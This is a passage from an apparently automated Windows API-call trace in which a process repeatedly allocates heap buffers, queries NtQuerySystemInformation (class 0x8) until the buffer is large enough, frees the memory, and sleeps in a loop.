| out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0285.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0285.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0285.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0285.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0285.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.596] Sleep (dwMilliseconds=0x110) [0285.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0285.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0285.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0285.711] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0285.712] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0285.712] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.712] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0285.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0285.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.713] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0285.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.714] Sleep (dwMilliseconds=0x110) [0285.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0285.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0285.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0285.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0285.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0285.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0285.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0285.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0285.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.753] Sleep (dwMilliseconds=0x110) [0285.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0285.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0285.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0285.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0285.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0285.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0285.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0285.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0285.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.796] Sleep (dwMilliseconds=0x110) [0285.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0285.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0285.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0285.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0285.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0285.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0285.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0285.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0285.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.814] Sleep (dwMilliseconds=0x110) [0285.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0285.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0285.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0285.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0285.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0285.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0285.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0285.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0285.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.829] Sleep (dwMilliseconds=0x110) [0285.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0285.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0285.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0285.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0285.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0285.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0285.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0285.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0285.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.862] Sleep (dwMilliseconds=0x110) [0285.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0285.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0285.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0285.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0285.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0285.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0285.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0285.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0285.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.877] Sleep (dwMilliseconds=0x110) [0285.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0285.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0285.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0285.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0285.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0285.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0285.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0285.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0285.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.890] Sleep (dwMilliseconds=0x110) [0285.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0285.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0285.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0285.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0285.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0285.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0285.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0285.913] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0285.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.913] Sleep (dwMilliseconds=0x110) [0285.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0285.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0285.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0285.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0285.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0285.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0285.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0285.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0285.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.926] Sleep (dwMilliseconds=0x110) [0285.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0285.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0285.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0285.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0285.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0285.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0285.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0285.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0285.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0285.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0285.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0285.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0285.971] Sleep (dwMilliseconds=0x110) [0286.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0286.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0286.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0286.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0286.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0286.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0286.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0286.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0286.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.345] Sleep (dwMilliseconds=0x110) [0286.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0286.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0286.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0286.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0286.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0286.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0286.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0286.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0286.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.441] Sleep (dwMilliseconds=0x110) [0286.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0286.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0286.500] RtlAllocateHeap 